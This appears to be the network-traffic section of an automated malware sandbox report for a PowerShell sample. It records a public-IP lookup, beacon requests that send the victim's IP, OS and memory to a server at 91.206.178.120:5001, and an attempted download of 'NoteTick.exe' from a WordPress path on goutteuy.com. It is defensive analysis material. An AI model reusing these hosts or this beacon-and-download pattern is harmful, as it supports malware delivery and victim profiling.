                                                                        Feb 18, 2025 08:29:06.738420963 CET49733443192.168.2.4185.211.7.193
                                                                        Feb 18, 2025 08:29:06.738439083 CET44349733185.211.7.193192.168.2.4
                                                                        Feb 18, 2025 08:29:06.738519907 CET44349733185.211.7.193192.168.2.4
                                                                        Feb 18, 2025 08:29:06.738568068 CET49733443192.168.2.4185.211.7.193
                                                                        Feb 18, 2025 08:29:06.762535095 CET49733443192.168.2.4185.211.7.193
                                                                        Feb 18, 2025 08:29:06.972670078 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:06.972734928 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:06.972794056 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:06.973558903 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:06.973573923 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.438771009 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.438838959 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.444770098 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.444788933 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.445169926 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.445216894 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.453003883 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.499335051 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.577337980 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.577409029 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.577424049 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.577461958 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.577467918 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.577500105 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.577548027 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.577591896 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.577656031 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.577699900 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.577748060 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.577790976 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.577924967 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.577966928 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.578012943 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.578058004 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.578142881 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.578185081 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.581641912 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.581700087 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.581763983 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.581814051 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.581852913 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.581891060 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.581921101 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.581978083 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.658957958 CET497375001192.168.2.491.206.178.120
                                                                        Feb 18, 2025 08:29:07.663826942 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.663891077 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.663916111 CET50014973791.206.178.120192.168.2.4
                                                                        Feb 18, 2025 08:29:07.663952112 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.663989067 CET497375001192.168.2.491.206.178.120
                                                                        Feb 18, 2025 08:29:07.664005041 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.664130926 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.664241076 CET497375001192.168.2.491.206.178.120
                                                                        Feb 18, 2025 08:29:07.664266109 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.664303064 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.664355993 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.664366007 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.664406061 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.664411068 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.664447069 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.664450884 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.664482117 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.664499998 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.664505005 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.664560080 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.664562941 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.664572954 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.664661884 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.664668083 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.664768934 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.664978981 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.665034056 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.665055037 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.665060043 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.665065050 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.665163040 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.665167093 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.665174007 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.665215015 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.665683031 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.665770054 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.665771008 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.665776968 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.665813923 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.665817976 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.665867090 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.665870905 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.665911913 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.669095993 CET50014973791.206.178.120192.168.2.4
                                                                        Feb 18, 2025 08:29:07.752115965 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.752235889 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.752263069 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.752304077 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.752309084 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.752341986 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.752377987 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.752413988 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.752471924 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.752513885 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.752579927 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.752633095 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.752671003 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.752720118 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.752762079 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.752842903 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.752851963 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.752902031 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.752952099 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.753005028 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.753041983 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.753091097 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.753151894 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.753211975 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.753242970 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.753295898 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.753335953 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.753387928 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.753463030 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.753521919 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.753568888 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.753617048 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.753653049 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.753700972 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.754448891 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.754506111 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.754538059 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.754591942 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.837148905 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.837269068 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.837616920 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.837682009 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.837699890 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.837754965 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.837784052 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.837831974 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.837837934 CET44349734104.18.10.207192.168.2.4
                                                                        Feb 18, 2025 08:29:07.837886095 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.837918043 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:07.837918043 CET49734443192.168.2.4104.18.10.207
                                                                        Feb 18, 2025 08:29:08.318006992 CET50014973791.206.178.120192.168.2.4
                                                                        Feb 18, 2025 08:29:08.328344107 CET50014973791.206.178.120192.168.2.4
                                                                        Feb 18, 2025 08:29:08.328399897 CET50014973791.206.178.120192.168.2.4
                                                                        Feb 18, 2025 08:29:08.328516006 CET497375001192.168.2.491.206.178.120
                                                                        Feb 18, 2025 08:29:08.328566074 CET497375001192.168.2.491.206.178.120
                                                                        Feb 18, 2025 08:29:08.333429098 CET50014973791.206.178.120192.168.2.4
                                                                        Feb 18, 2025 08:29:08.931941986 CET4973180192.168.2.4104.26.13.205
                                                                        Feb 18, 2025 08:29:52.785151958 CET6519853192.168.2.4162.159.36.2
                                                                        Feb 18, 2025 08:29:52.790086031 CET5365198162.159.36.2192.168.2.4
                                                                        Feb 18, 2025 08:29:52.790199041 CET6519853192.168.2.4162.159.36.2
                                                                        Feb 18, 2025 08:29:52.795046091 CET5365198162.159.36.2192.168.2.4
                                                                        Feb 18, 2025 08:29:53.277612925 CET6519853192.168.2.4162.159.36.2
                                                                        Feb 18, 2025 08:29:53.445013046 CET6519853192.168.2.4162.159.36.2
                                                                        Feb 18, 2025 08:29:53.450069904 CET5365198162.159.36.2192.168.2.4
                                                                        Feb 18, 2025 08:29:53.450129032 CET6519853192.168.2.4162.159.36.2

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Feb 18, 2025 08:29:02.692496061 CET6048853192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:29:02.699337959 CET53604881.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:29:05.591137886 CET5222153192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:29:05.634382010 CET53522211.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:29:06.941977978 CET6503353192.168.2.41.1.1.1
                                                                        Feb 18, 2025 08:29:06.949064016 CET53650331.1.1.1192.168.2.4
                                                                        Feb 18, 2025 08:29:52.784485102 CET5360305162.159.36.2192.168.2.4
                                                                        Feb 18, 2025 08:29:53.519424915 CET53491631.1.1.1192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Feb 18, 2025 08:29:02.692496061 CET192.168.2.41.1.1.10xca25Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:29:05.591137886 CET192.168.2.41.1.1.10x6ddeStandard query (0)goutteuy.comA (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:29:06.941977978 CET192.168.2.41.1.1.10x395aStandard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Feb 18, 2025 08:29:02.699337959 CET1.1.1.1192.168.2.40xca25No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:29:02.699337959 CET1.1.1.1192.168.2.40xca25No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:29:02.699337959 CET1.1.1.1192.168.2.40xca25No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:29:05.634382010 CET1.1.1.1192.168.2.40x6ddeNo error (0)goutteuy.com185.211.7.193A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:29:06.949064016 CET1.1.1.1192.168.2.40x395aNo error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                        Feb 18, 2025 08:29:06.949064016 CET1.1.1.1192.168.2.40x395aNo error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • goutteuy.com
                                                                        • maxcdn.bootstrapcdn.com
                                                                        • api.ipify.org
                                                                        • 91.206.178.120:5001

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449731104.26.13.205806808C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:29:02.713057995 CET158OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: api.ipify.org
                                                                        Connection: Keep-Alive
                                                                        Feb 18, 2025 08:29:03.178155899 CET430INHTTP/1.1 200 OK
                                                                        Date: Tue, 18 Feb 2025 07:29:03 GMT
                                                                        Content-Type: text/plain
                                                                        Content-Length: 12
                                                                        Connection: keep-alive
                                                                        Vary: Origin
                                                                        cf-cache-status: DYNAMIC
                                                                        Server: cloudflare
                                                                        CF-RAY: 913c4dca7c860fa7-EWR
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1537&min_rtt=1537&rtt_var=768&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=158&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                        Data Ascii: 8.46.123.189


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.44973291.206.178.12050016808C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:29:04.343100071 CET264OUTGET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=33884 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: 91.206.178.120:5001
                                                                        Connection: Keep-Alive
                                                                        Feb 18, 2025 08:29:05.565612078 CET174INHTTP/1.1 200 OK
                                                                        Server: Werkzeug/3.1.3 Python/3.10.12
                                                                        Date: Tue, 18 Feb 2025 07:29:05 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 21
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.44973791.206.178.12050016808C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Feb 18, 2025 08:29:07.664241076 CET170OUTGET /script_end?random_number=33884 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: 91.206.178.120:5001
                                                                        Feb 18, 2025 08:29:08.318006992 CET174INHTTP/1.1 200 OK
                                                                        Server: Werkzeug/3.1.3 Python/3.10.12
                                                                        Date: Tue, 18 Feb 2025 07:29:08 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Content-Length: 19
                                                                        Connection: close


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.449733185.211.7.1934436808C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-02-18 07:29:06 UTC209OUTGET /wp-content/plugins/header-footer/images/NoteTick.exe HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: goutteuy.com
                                                                        Connection: Keep-Alive
                                                                        2025-02-18 07:29:06 UTC472INHTTP/1.1 404 Not Found
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        last-modified: Fri, 07 Jan 2022 09:51:35 GMT
                                                                        etag: "999-61d80d27-4ab5739bf7ac3281;;;"
                                                                        accept-ranges: bytes
                                                                        content-length: 2457
                                                                        date: Tue, 18 Feb 2025 07:29:06 GMT
                                                                        server: LiteSpeed
                                                                        platform: hostinger
                                                                        panel: hpanel
                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                        2025-02-18 07:29:06 UTC896INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69
                                                                        Data Ascii: <!DOCTYPE html><html lang="en-us" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# sioc: http://rdfs.org/sioc/ns# si
                                                                        2025-02-18 07:29:06 UTC1561INData Raw: 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6f 70 73 2c 20 73 6f 6d 65 74 68 69 6e 67 20 6c 6f 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 6f 70 73 2c 20 6c 6f 6f 6b 73 20 6c 69
                                                                        Data Ascii: bsolute; } </style> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Oops, something lost</title> <meta name="description" content="Oops, looks li


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.449734104.18.10.2074436808C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-02-18 07:29:07 UTC344OUTGET /bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1
                                                                        Accept: */*
                                                                        Accept-Language: en-CH
                                                                        Accept-Encoding: gzip, deflate
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                        Host: maxcdn.bootstrapcdn.com
                                                                        Connection: Keep-Alive
                                                                        2025-02-18 07:29:07 UTC952INHTTP/1.1 200 OK
                                                                        Date: Tue, 18 Feb 2025 07:29:07 GMT
                                                                        Content-Type: text/css; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        CDN-PullZone: 252412
                                                                        CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                        CDN-RequestCountryCode: US
                                                                        Vary: Accept-Encoding
                                                                        Access-Control-Allow-Origin: *
                                                                        Cache-Control: public, max-age=31919000
                                                                        ETag: W/"ec3bb52a00e176a7181d454dffaea219"
                                                                        Last-Modified: Mon, 25 Jan 2021 22:03:59 GMT
                                                                        CDN-ProxyVer: 1.06
                                                                        CDN-RequestPullSuccess: True
                                                                        CDN-RequestPullCode: 200
                                                                        CDN-CachedAt: 12/24/2024 11:48:40
                                                                        CDN-EdgeStorageId: 718
                                                                        timing-allow-origin: *
                                                                        cross-origin-resource-policy: cross-origin
                                                                        X-Content-Type-Options: nosniff
                                                                        CDN-Status: 200
                                                                        CDN-RequestTime: 0
                                                                        CDN-RequestId: e6a91a8b3f8912bc7b5ad8b75eed4780
                                                                        CDN-Cache: HIT
                                                                        CF-Cache-Status: HIT
                                                                        Age: 2070229
                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                        Server: cloudflare
                                                                        CF-RAY: 913c4de5fc104333-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-02-18 07:29:07 UTC417INData Raw: 37 62 66 61 0d 0a 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 33 2e 33 2e 37 20 28 68 74 74 70 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 36 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 33 2e 30 2e 33 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b
                                                                        Data Ascii: 7bfa/*! * Bootstrap v3.3.7 (http://getbootstrap.com) * Copyright 2011-2016 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{
                                                                        2025-02-18 07:29:07 UTC1369INData Raw: 75 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 2c 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 75 64 69 6f 2c 63 61 6e 76 61 73 2c 70 72 6f 67 72 65 73 73 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 5b 68 69 64 64 65 6e 5d 2c 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 61 3a 61 63 74 69 76 65 2c 61 3a 68 6f 76 65 72 7b 6f 75 74 6c 69 6e 65 3a 30 7d 61 62 62 72 5b 74 69 74 6c 65 5d 7b 62
                                                                        Data Ascii: u,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{b
